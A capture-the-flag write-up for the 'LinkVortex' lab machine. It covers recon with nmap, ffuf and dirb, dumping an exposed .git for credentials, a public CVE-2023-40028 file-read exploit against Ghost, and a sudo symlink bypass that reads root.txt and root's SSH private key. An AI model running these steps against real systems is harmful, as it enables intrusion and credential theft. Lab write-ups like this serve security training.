Explore the fundamentals of cybersecurity in the LinkVortex Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts#

10.10.11.47 dev.linkvortex.htb linkvortex.htb

Script to add hosts automatically#

ip="10.10.11.47"
domain="dev.linkvortex.htb linkvortex.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping#

nmap -sCV linkvortex.htb

Nmap scan report for linkvortex.htb (10.10.11.47)
Host is up (0.050s latency).
rDNS record for 10.10.11.47: dev.linkvortex.htb
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
|_  256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
80/tcp open  http    Apache httpd
|_http-server-header: Apache
|_http-title: BitByBit Hardware
| http-robots.txt: 4 disallowed entries 
|_/ghost/ /p/ /email/ /r/
|_http-generator: Ghost 5.58
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Subdomain Enumeration:

ffuf -w /usr/share/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://linkvortex.htb -H 'Host: FUZZ.linkvortex.htb' -fs 230
  • dev
dirb dev.linkvortex.htb
  • .git
git-dumper http://dev.linkvortex.htb ./dump
cat ./dump/ghost/core/test/regression/api/admin/authentication.test.js | grep "password"

This yields OctopiFociPilfer45

git clone https://github.com/0xyassine/CVE-2023-40028 
cd CVE-2023-40028 
nano ./CVE-2023-40028.sh # change the 127.0.0.1 to your target
./CVE-2023-40028.sh -u admin@linkvortex.htb -p OctopiFociPilfer45

In the dumped .git, we found Dockerfile.ghost, which reveals the container path to config.production.json at /var/lib/ghost/config.production.json.

/var/lib/ghost/config.production.json

Output:

{
  "url": "http://localhost:2368",
  "server": {
    "port": 2368,
    "host": "::"
  },
  "mail": {
    "transport": "Direct"
  },
  "logging": {
    "transports": ["stdout"]
  },
  "process": "systemd",
  "paths": {
    "contentPath": "/var/lib/ghost/content"
  },
  "spam": {
    "user_login": {
        "minWait": 1,
        "maxWait": 604800000,
        "freeRetries": 5000
    }
  },
  "mail": {
     "transport": "SMTP",
     "options": {
      "service": "Google",
      "host": "linkvortex.htb",
      "port": 587,
      "auth": {
        "user": "bob@linkvortex.htb",
        "pass": "fibber-talented-worth"
        }
      }
    }
}

This yields fibber-talented-worth

ssh bob@linkvortex.htb

cat user.txt
sudo -l

Output:

 (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png

cat /opt/ghost/clean_symlink.sh

#!/bin/bash
QUAR_DIR="/var/quarantined"
if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi
LINK=$1
if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi
if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi

The script quarantines .png symbolic links, prevents access to critical files (/etc or /root), and optionally displays file contents (CHECK_CONTENT=true), making it exploitable if symbolic links point to sensitive files outside /etc or /root.

ln -s /root/root.txt pwn.txt
ln -s /home/bob/pwn.txt pwn.png
sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/pwn.png

Reveals the root flag.

Beyond Root#

Just the same but for the root user private key:

ln -s /root/.ssh/id_rsa hacking.txt
ln -s /home/bob/hacking.txt bild.png
sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/bild.png
echo -n 'Waiting for the key to be copied. Press Enter to continue: '; read
nano /tmp/id_rsa
chmod 600 /tmp/id_rsa
ssh -i /tmp/id_rsa root@127.0.0.1

Copy the id_rsa private key to your machine and use it to SSH into the target as root from your local system if needed.